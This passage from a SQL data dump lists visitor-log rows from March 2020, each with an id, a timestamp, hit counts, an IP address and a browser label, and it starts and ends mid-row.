,1,1,0,0,'109.74.154.72','chrome'),(489550,1584534921,1,1,0,0,'91.196.178.134','firefox'),(489551,1584534952,1,1,0,0,'66.249.64.24','chrome'),(489552,1584535383,1,1,0,0,'178.154.171.134','other'),(489553,1584535542,2,2,0,0,'157.55.39.239','other'),(489554,1584536401,1,1,0,0,'195.211.173.40','chrome'),(489555,1584536426,1,1,0,0,'130.180.208.51','chrome'),(489556,1584536547,1,1,0,0,'207.46.13.104','other'),(489557,1584536703,1,1,0,0,'46.211.55.143','chrome'),(489558,1584536896,1,1,0,0,'212.60.7.58','firefox'),(489559,1584537421,1,1,0,0,'46.201.174.210','chrome'),(489560,1584537970,1,1,0,0,'8.29.198.26','other'),(489561,1584538312,1,1,0,0,'17.58.101.25','other'),(489562,1584538673,1,1,0,0,'8.29.198.27','other'),(489563,1584539066,1,1,0,0,'157.55.39.239','other'),(489564,1584539360,1,1,0,0,'178.154.171.127','other'),(489565,1584539406,1,1,0,0,'91.196.178.175','chrome'),(489566,1584539494,1,0,1,0,'66.249.64.24',''),(489567,1584539837,1,1,0,0,'94.153.107.189','chrome'),(489568,1584539982,7,7,0,0,'159.65.24.22','chrome'),(489569,1584540319,1,1,0,0,'91.196.178.175','chrome'),(489570,1584542074,2,2,0,0,'91.196.178.66','chrome'),(489571,1584542132,1,1,0,0,'207.46.13.104','other'),(489572,1584542690,1,1,0,0,'157.55.39.239','other'),(489573,1584542733,1,1,0,0,'141.8.142.119','other'),(489574,1584543096,1,1,0,0,'66.249.64.23','chrome'),(489575,1584544293,1,1,0,0,'91.209.11.236','other'),(489576,1584544611,1,1,0,0,'141.8.188.25','other'),(489577,1584544769,3,3,0,0,'91.196.178.175','chrome'),(489578,1584544798,1,1,0,0,'141.8.183.73','other'),(489579,1584544956,1,1,0,0,'91.196.177.46','chrome'),(489580,1584545554,1,1,0,0,'141.8.188.25','other'),(489581,1584545556,1,1,0,0,'157.55.39.239','other'),(489582,1584547790,1,1,0,0,'77.111.247.53','chrome'),(489583,1584548292,1,1,0,0,'176.37.49.24','chrome'),(489584,1584548551,1,1,0,0,'178.154.171.134','other'),(489585,1584548603,1,1,0,0,'66.249.64.25','chrome'),(489586,1584548844,1,1,0,0,'66.249.70.33','chrome'),(489587,1584548865,1,1,0,0,'8.29.198.27','other'),(489588,1584549586,1,1,0,0,'8.29.198.26','other'),(489589,1584550223,1,1,0,0,'66.249.64.23','chrome'),(489590,1584550563,1,1,0,0,'121.230.228.115','chrome'),(489591,1584550567,1,1,0,0,'183.165.61.125','chrome'),(489592,1584550571,1,1,0,0,'223.241.176.87','chrome'),(489593,1584550587,1,1,0,0,'66.249.70.33','chrome'),(489594,1584550712,1,1,0,0,'66.249.64.24','chrome'),(489595,1584551239,1,1,0,0,'178.154.171.134','other'),(489596,1584551770,1,1,0,0,'157.55.39.239','other'),(489597,1584552082,3,3,0,0,'66.249.64.23','chrome'),(489598,1584552235,2,2,0,0,'91.196.178.117','chrome'),(489599,1584552669,1,1,0,0,'66.249.64.25','chrome'),(489600,1584553327,1,1,0,0,'66.249.70.38','chrome'),(489601,1584553380,2,2,0,0,'66.249.64.23','chrome'),(489602,1584554184,2,2,0,0,'31.13.127.11','other'),(489603,1584554185,4,4,0,0,'31.13.127.10','other'),(489607,1584554243,1,1,0,0,'157.55.39.239','other'),(489608,1584554247,1,1,0,0,'31.13.127.25','other'),(489609,1584554248,2,2,0,0,'31.13.127.19','other'),(489610,1584554249,1,1,0,0,'31.13.127.4','other'),(489611,1584554262,5,5,0,0,'31.13.127.13','other'),(489614,1584554263,4,4,0,0,'31.13.127.23','other'),(489618,1584554269,2,2,0,0,'31.13.127.12','other'),(489623,1584554270,1,1,0,0,'31.13.127.14','other'),(489624,1584554277,1,1,0,0,'31.13.127.8','other'),(489627,1584554341,1,1,0,0,'91.196.178.5','chrome'),(489628,1584554492,2,2,0,0,'66.249.64.25','chrome'),(489629,1584554537,3,3,0,0,'66.249.64.23','chrome'),(489630,1584554554,1,0,1,0,'207.46.13.104',''),(489631,1584555433,1,1,0,0,'178.154.171.134','other'),(489632,1584556087,1,1,0,0,'46.219.225.78','chrome'),(489633,1584556429,1,1,0,0,'222.220.153.66','chrome'),(489634,1584556503,1,1,0,0,'66.249.64.24','chrome'),(489635,1584556897,1,0,1,0,'207.46.13.104',''),(489636,1584557035,1,0,1,0,'66.249.70.36',''),(489637,1584557046,1,1,0,0,'66.249.64.25','chrome'),(489638,1584557083,1,1,0,0,'178.154.171.134','other'),(489639,1584557980,1,1,0,0,'66.249.64.24','chrome'),(489640,1584558116,3,3,0,0,'66.249.64.25','chrome'),(489641,1584558203,1,1,0,0,'66.249.64.23','chrome'),(489642,1584558373,1,1,0,0,'207.46.13.104','other'),(489643,1584558882,1,1,0,0,'178.95.245.37','other'),(489644,1584559033,1,1,0,0,'157.55.39.239','other'),(489645,1584559314,1,1,0,0,'91.196.178.10','chrome'),(489646,1584559720,1,1,0,0,'8.29.198.27','other'),(489647,1584560467,1,1,0,0,'8.29.198.26','other'),(489648,1584561068,1,1,0,0,'40.77.191.63','other'),(489649,1584561663,1,1,0,0,'66.249.64.25','chrome'),(489650,1584561762,1,1,0,0,'91.196.178.5','chrome'),(489651,1584562489,2,2,0,0,'157.55.39.239','other'),(489652,1584562529,1,1,0,0,'60.187.39.176','chrome'),(489653,1584563065,1,1,0,0,'141.8.188.25','other'),(489654,1584563470,1,1,0,0,'66.249.70.33','chrome'),(489655,1584563514,1,1,0,0,'66.249.64.25','chrome'),(489656,1584565251,1,1,0,0,'207.46.13.104','other'),(489657,1584565651,1,0,1,0,'66.249.64.23',''),(489658,1584566705,1,1,0,0,'66.102.9.169','chrome'),(489659,1584566828,3,1,2,0,'207.46.13.104',''),(489660,1584567454,1,0,1,0,'157.55.39.239',''),(489661,1584568147,2,2,0,0,'66.249.64.23','chrome'),(489662,1584568427,1,0,1,0,'66.249.64.24',''),(489663,1584568883,1,1,0,0,'5.45.207.65','other'),(489664,1584569171,1,1,0,0,'209.17.96.218','other'),(489665,1584570355,1,1,0,0,'66.249.70.36','chrome'),(489666,1584570570,1,1,0,0,'141.8.132.31','other'),(489667,1584570580,1,1,0,0,'8.29.198.27','other'),(489668,1584571120,1,1,0,0,'60.189.123.116','chrome'),(489669,1584571219,1,1,0,0,'157.55.39.239','other'),(489670,1584571349,1,1,0,0,'8.29.198.26','other'),(489671,1584571564,1,1,0,0,'66.249.64.25','chrome'),(489672,1584571591,1,1,0,0,'66.249.70.36','chrome'),(489673,1584573558,1,1,0,0,'141.8.142.177','other'),(489674,1584573883,1,1,0,0,'157.55.39.239','other'),(489675,1584574936,1,1,0,0,'66.249.64.23','chrome'),(489676,1584575297,1,1,0,0,'141.8.132.9','other'),(489677,1584575593,1,1,0,0,'141.8.142.128','other'),(489678,1584575623,2,2,0,0,'66.70.160.92','msie'),(489679,1584577226,1,1,0,0,'207.46.13.39','other'),(489680,1584578213,1,1,0,0,'66.249.70.38','chrome'),(489681,1584578552,1,1,0,0,'114.237.53.152','chrome'),(489682,1584578929,25,25,0,0,'51.77.249.198','chrome'),(489683,1584579053,1,1,0,0,'141.8.183.100','other'),(489684,1584579261,1,1,0,0,'66.249.64.25','chrome'),(489685,1584579313,1,1,0,0,'62.205.134.182','other'),(489686,1584579452,1,1,0,0,'183.143.61.204','chrome'),(489687,1584579468,1,1,0,0,'104.200.46.178','chrome'),(489688,1584580345,1,1,0,0,'207.46.13.104','other'),(489689,1584581432,1,1,0,0,'8.29.198.25','other'),(489690,1584581727,2,2,0,0,'157.55.39.239','other'),(489691,1584582222,1,1,0,0,'8.29.198.27','other'),(489692,1584583877,1,1,0,0,'66.249.64.24','chrome'),(489693,1584583886,1,1,0,0,'66.249.64.23','chrome'),(489694,1584584785,2,2,0,0,'207.46.13.104','other'),(489695,1584585096,1,1,0,0,'223.241.29.59','chrome'),(489696,1584585188,1,1,0,0,'157.55.39.239','other'),(489697,1584586839,1,1,0,0,'207.46.13.39','other'),(489698,1584586924,1,1,0,0,'66.249.64.24','chrome'),(489699,1584588591,2,2,0,0,'207.46.13.104','other'),(489700,1584588903,2,0,2,0,'207.46.13.39',''),(489701,1584590208,1,1,0,0,'207.46.13.39','other'),(489702,1584590440,1,1,0,0,'157.55.39.239','other'),(489703,1584590779,2,2,0,0,'207.46.13.104','other'),(489704,1584591085,1,1,0,0,'66.249.64.24','chrome'),(489705,1584591246,149,149,0,0,'151.80.39.80','other'),(489706,1584591459,125,125,0,0,'151.80.39.236','other'),(489707,1584591552,1,1,0,0,'66.249.64.23','chrome'),(489708,1584592231,1,0,1,0,'66.249.64.24',''),(489709,1584592287,1,1,0,0,'8.29.198.26','other'),(489710,1584592610,1,1,0,0,'66.249.70.33','chrome'),(489711,1584592674,1,1,0,0,'212.178.4.113','chrome'),(489712,1584592886,2,1,1,0,'66.249.64.25',''),(489713,1584593040,1,1,0,0,'66.249.70.36','chrome'),(489714,1584593093,1,1,0,0,'8.29.198.27','other'),(489715,1584594222,1,1,0,0,'66.249.64.24','chrome'),(489716,1584594703,3,3,0,0,'66.249.64.25','chrome'),(489717,1584594882,1,1,0,0,'66.249.70.38','chrome'),(489718,1584595183,2,2,0,0,'46.4.107.106','other'),(489719,1584595977,1,1,0,0,'66.249.70.33','chrome'),(489720,1584596504,1,1,0,0,'62.205.134.182','other'),(489721,1584597006,1,1,0,0,'66.249.64.25','chrome'),(489722,1584597353,3,3,0,0,'66.249.64.24','chrome'),(489723,1584597531,1,1,0,0,'91.196.178.73','chrome'),(489724,1584597691,2,2,0,0,'66.249.64.23','chrome'),(489725,1584598225,1,1,0,0,'91.196.177.46','chrome'),(489726,1584598725,1,1,0,0,'66.249.64.23','chrome'),(489727,1584599549,4,4,0,0,'66.249.64.24','chrome'),(489728,1584599733,1,1,0,0,'66.249.64.23','chrome'),(489729,1584600330,1,1,0,0,'157.55.39.199','other'),(489730,1584600694,2,2,0,0,'91.196.178.175','chrome'),(489731,1584600705,1,1,0,0,'66.249.64.25','chrome'),(489732,1584601142,1,1,0,0,'141.8.132.9','other'),(489733,1584601380,1,1,0,0,'95.108.213.61','other'),(489734,1584601453,2,2,0,0,'66.249.64.23','chrome'),(489735,1584601644,1,1,0,0,'91.196.178.66','chrome'),(489736,1584601800,1,1,0,0,'66.249.64.25','chrome'),(489737,1584603133,1,1,0,0,'8.29.198.26','other'),(489738,1584603228,1,1,0,0,'66.249.64.23','chrome'),(489739,1584603284,1,1,0,0,'66.249.64.24','chrome'),(489740,1584603843,1,1,0,0,'91.196.178.66','chrome'),(489741,1584603880,1,1,0,0,'173.252.111.2','other'),(489742,1584603881,1,1,0,0,'173.252.111.10','other'),(489743,1584603882,1,1,0,0,'173.252.111.11','other'),(489748,1584603892,1,1,0,0,'173.252.111.23','other'),(489749,1584603895,1,1,0,0,'173.252.111.12','other'),(489750,1584603921,1,1,0,0,'173.252.95.11','other'),(489751,1584603945,1,1,0,0,'37.73.215.244','chrome'),(489752,1584603953,1,1,0,0,'8.29.198.27','other'),(489753,1584604058,1,1,0,0,'128.124.79.41','chrome'),(489754,1584604395,1,1,0,0,'91.196.177.46','chrome'),(489755,1584604718,3,3,0,0,'66.249.64.23','chrome'),(489756,1584604804,1,1,0,0,'66.249.64.25','chrome'),(489757,1584605132,2,2,0,0,'66.249.64.24','chrome'),(489758,1584605684,1,1,0,0,'91.196.178.68','chrome'),(489759,1584606176,1,1,0,0,'66.249.70.36','chrome'),(489760,1584606447,1,1,0,0,'91.196.178.66','chrome'),(489761,1584606995,1,1,0,0,'66.249.64.24','chrome'),(489762,1584607215,1,1,0,0,'66.249.64.23','chrome'),(489763,1584607814,1,1,0,0,'95.216.96.242','other'),(489764,1584608511,1,1,0,0,'5.58.74.169','msie'),(489765,1584609026,1,1,0,0,'66.249.64.25','chrome'),(489766,1584609082,1,1,0,0,'66.249.64.24','chrome'),(489767,1584609676,1,1,0,0,'66.249.70.36','chrome'),(489768,1584609894,1,1,0,0,'173.252.111.4','other'),(489769,1584610377,3,3,0,0,'66.249.64.24','chrome'),(489770,1584610853,1,1,0,0,'66.249.70.33','chrome'),(489771,1584610889,1,1,0,0,'66.249.64.23','chrome'),(489772,1584611989,1,1,0,0,'141.8.183.15','other'),(489773,1584612154,1,1,0,0,'40.71.44.234','other'),(489774,1584612194,1,1,0,0,'66.249.64.24','chrome'),(489775,1584612241,1,1,0,0,'180.119.141.25','chrome'),(489776,1584612685,1,1,0,0,'95.108.213.61','other'),(489777,1584613772,1,1,0,0,'91.196.178.163','chrome'),(489778,1584613819,1,1,0,0,'54.237.148.202','chrome'),(489779,1584613972,2,2,0,0,'8.29.198.27','other'),(489780,1584615643,1,1,0,0,'66.249.64.25','chrome'),(489781,1584615684,1,1,0,0,'95.108.213.61','other'),(489782,1584615817,1,1,0,0,'77.222.134.99','firefox'),(489783,1584615882,1,1,0,0,'91.196.178.83','firefox'),(489784,1584615993,1,1,0,0,'45.82.255.96','chrome'),(489785,1584616271,1,1,0,0,'212.82.217.41','chrome'),(489786,1584616396,1,1,0,0,'69.171.251.10','other'),(489787,1584616600,1,1,0,0,'91.196.178.188','chrome'),(489788,1584616879,2,2,0,0,'141.8.183.18','other'),(489789,1584617019,1,1,0,0,'207.46.13.224','other'),(489790,1584617588,1,1,0,0,'128.124.79.41','chrome'),(489791,1584617609,1,1,0,0,'157.55.39.199','other'),(489792,1584617743,1,1,0,0,'66.249.64.24','chrome'),(489793,1584617968,1,1,0,0,'37.9.113.6','other'),(489794,1584618566,2,2,0,0,'157.55.39.198','other'),(489795,1584618709,1,1,0,0,'109.74.154.72','chrome'),(489796,1584618955,1,1,0,0,'66.249.70.36','chrome'),(489797,1584619017,1,1,0,0,'207.46.13.0','other'),(489798,1584619725,1,0,1,0,'157.55.39.90',''),(489799,1584619799,1,1,0,0,'66.249.64.24','chrome'),(489800,1584620132,2,2,0,0,'66.249.64.25','chrome'),(489801,1584620275,1,1,0,0,'207.46.13.224','other'),(489802,1584620938,1,1,0,0,'141.8.142.132','other'),(489803,1584621201,1,1,0,0,'66.249.64.23','chrome'),(489804,1584621335,1,1,0,0,'66.249.70.33','chrome'),(489805,1584621785,2,2,0,0,'66.249.64.24','chrome'),(489806,1584622830,1,1,0,0,'66.249.64.24','chrome'),(489807,1584623598,1,1,0,0,'193.194.127.32','chrome'),(489808,1584623606,1,1,0,0,'66.249.64.23','chrome'),(489809,1584623679,1,1,0,0,'111.75.127.48','chrome'),(489810,1584624018,2,1,1,0,'207.46.13.224',''),(489811,1584624738,2,2,0,0,'66.249.64.25','chrome'),(489812,1584624814,2,2,0,0,'8.29.198.25','other'),(489813,1584625474,2,2,0,0,'66.249.64.24','chrome'),(489814,1584625505,1,1,0,0,'66.249.64.23','chrome'),(489815,1584626585,2,2,0,0,'66.249.64.25','chrome'),(489816,1584626922,2,2,0,0,'66.249.64.23','chrome'),(489817,1584627972,1,1,0,0,'66.249.64.24','chrome'),(489818,1584628096,1,1,0,0,'207.46.13.224','other'),(489819,1584628589,1,1,0,0,'37.9.113.142','other'),(489820,1584628722,1,1,0,0,'37.9.113.33','other'),(489821,1584629018,1,1,0,0,'66.249.64.25','chrome'),(489822,1584630154,1,1,0,0,'141.8.183.100','other'),(489823,1584630213,1,1,0,0,'66.249.64.23','chrome'),(489824,1584630284,1,1,0,0,'141.8.188.25','other'),(489825,1584630349,1,1,0,0,'141.8.142.119','other'),(489826,1584630352,1,1,0,0,'37.9.113.33','other'),(489827,1584630355,2,2,0,0,'37.9.113.202','other'),(489828,1584630357,1,1,0,0,'95.108.213.39','other'),(489829,1584630360,1,1,0,0,'141.8.142.161','other'),(489830,1584630936,1,1,0,0,'46.133.110.197','chrome'),(489831,1584631078,2,1,1,0,'66.249.64.25',''),(489832,1584631164,1,1,0,0,'141.8.142.132','other'),(489833,1584631984,2,2,0,0,'66.249.64.24','chrome'),(489834,1584632159,1,1,0,0,'141.8.188.12','other'),(489835,1584632283,1,1,0,0,'141.8.188.20','other'),(489836,1584632673,1,1,0,0,'91.196.178.11','chrome'),(489837,1584632719,1,1,0,0,'37.9.113.6','chrome'),(489838,1584632752,1,1,0,0,'141.8.183.33','other'),(489839,1584632757,1,1,0,0,'66.249.70.33','chrome'),(489840,1584633994,1,1,0,0,'141.8.188.25','other'),(489841,1584634076,2,2,0,0,'66.249.64.24','chrome'),(489842,1584634516,1,1,0,0,'141.8.188.20','other'),(489843,1584634632,1,1,0,0,'95.108.213.39','other'),(489844,1584634633,1,1,0,0,'37.9.113.39','other'),(489845,1584634676,1,1,0,0,'157.55.39.161','other'),(489846,1584634865,1,1,0,0,'141.8.132.2','other'),(489847,1584635299,1,1,0,0,'66.249.64.23','chrome'),(489848,1584635653,1,1,0,0,'8.29.198.25','other'),(489849,1584635809,1,1,0,0,'87.250.224.104','other'),(489850,1584636036,1,1,0,0,'141.8.142.132','other'),(489851,1584636050,1,1,0,0,'66.249.64.25','chrome'),(489852,1584636519,1,1,0,0,'5.182.36.218','chrome'),(489853,1584636520,1,1,0,0,'8.29.198.27','other'),(489855,1584636522,1,1,0,0,'46.149.167.161','chrome'),(489856,1584636886,1,1,0,0,'66.249.64.23','chrome'),(489857,1584637580,2,2,0,0,'157.55.39.161','other'),(489858,1584637589,2,2,0,0,'37.9.113.39','other'),(489859,1584637654,1,1,0,0,'207.46.13.224','other'),(489860,1584637778,1,1,0,0,'37.9.113.142','other'),(489861,1584638385,5,5,0,0,'66.249.64.25','chrome'),(489862,1584638892,2,2,0,0,'66.249.70.33','chrome'),(489863,1584639199,1,1,0,0,'66.249.64.24','chrome'),(489864,1584639255,2,2,0,0,'66.249.70.36','chrome'),(489865,1584639434,1,1,0,0,'66.249.64.25','chrome'),(489866,1584639465,1,1,0,0,'66.249.64.23','chrome'),(489867,1584639470,1,1,0,0,'5.45.207.65','other'),(489868,1584639575,1,1,0,0,'37.9.113.202','other'),(489869,1584639615,1,1,0,0,'207.46.13.69','other'),(489870,1584639859,1,1,0,0,'141.8.142.164','other'),(489871,1584640173,1,1,0,0,'141.8.132.28','other'),(489872,1584640375,1,1,0,0,'141.8.188.12','other'),(489873,1584640591,1,1,0,0,'37.9.113.39','other'),(489874,1584640593,1,1,0,0,'37.9.113.163','other'),(489875,1584640624,1,1,0,0,'37.9.113.142','other'),(489876,1584641058,1,1,0,0,'141.8.188.20','other'),(489877,1584641096,1,1,0,0,'91.196.178.94','chrome'),(489878,1584641168,1,1,0,0,'66.249.70.36','chrome'),(489879,1584641247,2,2,0,0,'66.249.64.23','chrome'),(489880,1584641295,1,1,0,0,'66.249.70.38','chrome'),(489881,1584641594,1,1,0,0,'141.8.188.39','other'),(489882,1584641613,1,1,0,0,'66.249.64.25','chrome'),(489883,1584641653,1,1,0,0,'66.249.64.24','chrome'),(489884,1584641655,1,1,0,0,'37.9.113.97','other'),(489885,1584641740,1,1,0,0,'178.154.171.7','other'),(489886,1584641879,1,1,0,0,'66.249.70.33','chrome'),(489887,1584642457,1,1,0,0,'141.8.188.25','other'),(489888,1584642460,1,1,0,0,'157.55.39.161','other'),(489889,1584642638,4,4,0,0,'66.249.64.23','chrome'),(489890,1584642682,1,1,0,0,'141.8.142.132','other'),(489891,1584642914,2,2,0,0,'141.8.188.12','other'),(489892,1584642997,1,1,0,0,'141.8.142.164','other'),(489893,1584643025,3,3,0,0,'66.249.64.25','chrome'),(489894,1584643144,1,1,0,0,'141.8.183.18','other'),(489895,1584643159,2,2,0,0,'66.249.64.24','chrome'),(489896,1584643697,1,1,0,0,'141.8.188.39','other'),(489897,1584643803,1,1,0,0,'141.8.142.177','other'),(489898,1584643805,1,1,0,0,'141.8.142.161','other'),(489899,1584643868,1,1,0,0,'207.46.13.224','other'),(489900,1584643963,1,1,0,0,'141.8.188.18','other'),(489901,1584644040,1,1,0,0,'66.249.64.25','chrome'),(489902,1584644136,1,1,0,0,'91.196.178.162','chrome'),(489903,1584644174,1,1,0,0,'141.8.183.15','other'),(489904,1584644317,2,2,0,0,'157.55.39.161','other'),(489905,1584644481,2,2,0,0,'141.8.188.25','other'),(489906,1584644520,1,1,0,0,'178.154.171.7','other'),(489907,1584644853,2,2,0,0,'66.249.70.36','chrome'),(489908,1584644964,1,1,0,0,'66.249.64.24','chrome'),(489909,1584645215,1,1,0,0,'141.8.142.50','other'),(489910,1584645369,1,1,0,0,'66.249.64.25','chrome'),(489911,1584645650,1,1,0,0,'141.8.132.37','other'),(489912,1584645655,1,1,0,0,'141.8.183.18','other'),(489913,1584645661,1,1,0,0,'178.154.171.7','other'),(489914,1584645928,1,1,0,0,'66.249.70.38','chrome'),(489915,1584646038,1,1,0,0,'141.8.183.53','other'),(489916,1584646168,1,1,0,0,'37.9.113.97','other'),(489917,1584646329,1,1,0,0,'141.8.142.132','other'),(489918,1584646502,1,1,0,0,'8.29.198.25','other'),(489919,1584647103,1,1,0,0,'207.46.13.224','other'),(489920,1584647170,1,1,0,0,'66.249.64.25','chrome'),(489921,1584647183,1,1,0,0,'157.55.39.161','other'),(489922,1584647363,1,1,0,0,'8.29.198.27','other'),(489923,1584647424,1,1,0,0,'173.252.111.6','other'),(489924,1584647425,1,1,0,0,'173.252.111.14','other'),(489925,1584647441,1,1,0,0,'141.8.188.39','other'),(489926,1584647794,1,0,1,0,'66.249.64.23',''),(489927,1584648058,1,1,0,0,'207.46.13.224','other'),(489928,1584648252,1,1,0,0,'66.249.64.25','chrome'),(489929,1584648347,1,1,0,0,'66.249.64.24','chrome'),(489930,1584648472,1,1,0,0,'37.9.113.97','other'),(489931,1584648475,1,1,0,0,'178.154.171.40','other'),(489932,1584648880,1,1,0,0,'157.55.39.161','other'),(489933,1584648884,1,1,0,0,'141.8.188.25','other'),(489934,1584648930,1,1,0,0,'66.249.70.36','chrome'),(489935,1584649448,1,1,0,0,'141.8.132.37','other'),(489936,1584649699,3,3,0,0,'151.80.39.236','other'),(489937,1584649723,3,3,0,0,'66.249.64.23','chrome'),(489938,1584649785,2,2,0,0,'66.249.64.25','chrome'),(489939,1584649791,1,1,0,0,'37.9.113.6','other'),(489940,1584649885,1,1,0,0,'66.249.70.33','chrome'),(489941,1584650100,1,1,0,0,'37.9.113.142','other'),(489942,1584650217,1,1,0,0,'151.80.39.80','other'),(489943,1584650286,1,1,0,0,'138.246.253.5','chrome'),(489944,1584650417,1,1,0,0,'141.8.183.100','other'),(489945,1584650430,1,1,0,0,'178.154.171.7','other'),(489946,1584650534,1,1,0,0,'66.249.70.38','chrome'),(489947,1584650699,1,1,0,0,'37.9.113.97','other'),(489948,1584650746,1,1,0,0,'151.80.39.236','other'),(489949,1584651011,2,2,0,0,'207.46.13.69','other'),(489950,1584651168,1,1,0,0,'66.249.64.24','chrome'),(489951,1584651198,1,1,0,0,'141.8.188.25','other'),(489952,1584651272,1,1,0,0,'141.8.142.177','other'),(489953,1584651342,3,3,0,0,'66.249.64.25','chrome'),(489954,1584651343,2,2,0,0,'207.46.13.224','other'),(489955,1584651665,1,1,0,0,'66.249.64.23','chrome'),(489956,1584651712,2,2,0,0,'141.8.183.100','other'),(489957,1584651755,1,1,0,0,'157.55.39.161','other'),(489958,1584651793,1,1,0,0,'66.249.70.38','chrome'),(489959,1584651906,1,1,0,0,'141.8.132.9','other'),(489960,1584651909,1,1,0,0,'37.9.113.10','other'),(489961,1584652448,1,1,0,0,'209.160.106.73','chrome'),(489962,1584652705,1,1,0,0,'207.46.13.224','other'),(489963,1584652852,1,1,0,0,'37.9.113.97','other'),(489964,1584652894,1,1,0,0,'151.80.39.80','other'),(489965,1584653104,1,1,0,0,'141.8.188.18','other'),(489966,1584653113,3,3,0,0,'66.249.64.23','chrome'),(489967,1584653259,1,1,0,0,'178.154.171.7','other'),(489968,1584653334,3,3,0,0,'66.249.64.24','chrome'),(489969,1584653834,1,1,0,0,'66.249.64.25','chrome'),(489970,1584654004,1,1,0,0,'141.8.142.119','other'),(489971,1584654123,1,1,0,0,'141.8.183.15','other'),(489972,1584654369,1,1,0,0,'141.8.183.100','other'),(489973,1584654490,1,1,0,0,'62.210.80.93','other'),(489974,1584654492,1,1,0,0,'151.80.39.236','other'),(489975,1584654570,1,1,0,0,'37.9.113.39','other'),(489976,1584654694,2,2,0,0,'66.249.64.24','chrome'),(489977,1584654929,2,2,0,0,'66.249.64.25','chrome'),(489978,1584655203,1,1,0,0,'157.55.39.161','other'),(489979,1584655249,1,1,0,0,'141.8.142.50','other'),(489980,1584655309,1,1,0,0,'66.249.64.23','chrome'),(489981,1584655325,1,1,0,0,'5.45.207.65','other'),(489982,1584655441,1,1,0,0,'66.249.70.36','chrome'),(489983,1584655450,1,1,0,0,'141.8.142.119','other'),(489984,1584655687,1,1,0,0,'66.249.64.24','chrome'),(489985,1584655958,1,1,0,0,'141.8.142.177','other'),(489986,1584656649,1,1,0,0,'207.46.13.69','other'),(489987,1584656661,1,1,0,0,'141.8.142.132','other'),(489988,1584656664,1,1,0,0,'37.9.113.33','other'),(489989,1584656788,2,2,0,0,'141.8.132.31','other'),(489990,1584656874,1,1,0,0,'66.249.64.25','chrome'),(489991,1584657028,1,1,0,0,'66.249.64.23','chrome'),(489992,1584657043,1,1,0,0,'66.249.70.38','chrome'),(489993,1584657051,1,1,0,0,'207.46.13.224','other'),(489994,1584657257,1,1,0,0,'141.8.132.9','other'),(489995,1584657320,1,1,0,0,'141.8.132.2','other'),(489996,1584657341,1,1,0,0,'8.29.198.26','other'),(489997,1584657437,1,1,0,0,'66.249.64.24','chrome'),(489998,1584657657,1,1,0,0,'66.249.70.36','chrome'),(489999,1584657964,1,1,0,0,'37.9.113.97','other'),(490000,1584658000,1,1,0,0,'2.47.39.217','other'),(490001,1584658025,1,1,0,0,'207.46.13.69','other'),(490002,1584658195,1,1,0,0,'8.29.198.27','other'),(490003,1584658324,1,1,0,0,'141.8.142.119','other'),(490004,1584658374,1,1,0,0,'141.8.183.18','other'),(490005,1584658580,1,1,0,0,'141.8.142.177','other'),(490006,1584659084,1,1,0,0,'157.55.39.161','other'),(490007,1584659089,1,1,0,0,'207.46.13.224','other'),(490008,1584659259,1,1,0,0,'66.249.70.33','chrome'),(490009,1584659387,1,1,0,0,'66.249.64.23','chrome'),(490010,1584659574,1,1,0,0,'141.8.183.15','other'),(490011,1584659750,2,2,0,0,'66.249.64.25','chrome'),(490012,1584660014,1,1,0,0,'141.8.188.12','other'),(490013,1584660322,1,1,0,0,'207.46.13.224','other'),(490014,1584660427,1,1,0,0,'141.8.183.100','other'),(490015,1584660758,1,1,0,0,'66.249.70.36','chrome'),(490016,1584660977,1,1,0,0,'95.108.213.61','other'),(490017,1584660980,1,1,0,0,'37.9.113.200','other'),(490018,1584661120,1,1,0,0,'141.8.188.39','other'),(490019,1584661288,1,1,0,0,'141.8.142.132','other'),(490020,1584661537,1,1,0,0,'141.8.132.28','other'),(490021,1584662027,1,1,0,0,'157.55.39.161','other'),(490022,1584662125,1,1,0,0,'141.8.188.12','other'),(490023,1584662247,2,2,0,0,'66.249.64.23','chrome'),(490024,1584662257,1,1,0,0,'207.46.13.69','other'),(490025,1584662278,2,2,0,0,'66.249.70.36','chrome'),(490026,1584662324,1,1,0,0,'66.249.64.25','chrome'),(490027,1584662356,1,1,0,0,'141.8.142.128','other'),(490028,1584662469,1,1,0,0,'141.8.132.12','other'),(490029,1584662758,1,1,0,0,'91.209.11.236','other'),(490030,1584662827,2,2,0,0,'37.9.113.39','other'),(490031,1584663015,1,1,0,0,'66.249.64.24','chrome'),(490032,1584663078,1,1,0,0,'141.8.142.119','other'),(490033,1584663238,1,1,0,0,'141.8.183.100','other'),(490034,1584663261,1,1,0,0,'66.249.64.25','chrome'),(490035,1584663733,2,2,0,0,'157.55.39.161','other'),(490036,1584663958,2,2,0,0,'141.8.132.12','other'),(490037,1584664048,1,1,0,0,'207.46.13.224','other'),(490038,1584664057,57,57,0,0,'151.80.39.236','other'),(490039,1584664063,78,78,0,0,'151.80.39.80','other'),(490040,1584664560,1,1,0,0,'66.249.70.38','chrome'),(490041,1584664618,1,1,0,0,'182.101.38.138','chrome'),(490042,1584664806,1,1,0,0,'141.8.132.9','other'),(490043,1584664854,1,1,0,0,'141.8.132.2','other'),(490044,1584664857,1,1,0,0,'95.108.181.104','other'),(490045,1584664875,1,1,0,0,'178.154.171.7','other'),(490046,1584664878,1,1,0,0,'141.8.142.128','other'),(490047,1584664968,60,60,0,0,'151.80.39.236','other'),(490048,1584664974,56,56,0,0,'151.80.39.80','other'),(490049,1584664996,1,1,0,0,'141.8.188.25','other'),(490050,1584665000,1,1,0,0,'37.9.113.97','other'),(490051,1584665035,1,1,0,0,'141.8.142.132','other'),(490052,1584665094,1,1,0,0,'141.8.132.28','other'),(490053,1584665111,1,0,1,0,'66.249.64.23',''),(490054,1584665325,1,1,0,0,'141.8.142.119','other'),(490055,1584665434,2,2,0,0,'141.8.132.37','other'),(490056,1584665515,1,1,0,0,'106.56.90.65','chrome'),(490057,1584665523,1,1,0,0,'66.249.64.25','chrome'),(490058,1584665691,1,1,0,0,'66.249.64.23','chrome'),(490059,1584665713,1,1,0,0,'62.205.134.182','other'),(490060,1584665824,2,2,0,0,'66.249.64.24','chrome'),(490061,1584665874,31,31,0,0,'151.80.39.236','other'),(490062,1584665879,1,1,0,0,'141.8.142.50','chrome'),(490063,1584665894,40,40,0,0,'151.80.39.80','other'),(490064,1584666244,2,2,0,0,'66.249.70.33','chrome'),(490065,1584666664,2,2,0,0,'66.249.64.23','chrome'),(490066,1584666831,1,1,0,0,'141.8.183.100','other'),(490067,1584666851,1,1,0,0,'5.255.253.8','other'),(490068,1584667224,5,5,0,0,'151.80.39.80','other'),(490069,1584667339,4,4,0,0,'151.80.39.236','other'),(490070,1584667439,1,1,0,0,'141.8.142.132','other'),(490071,15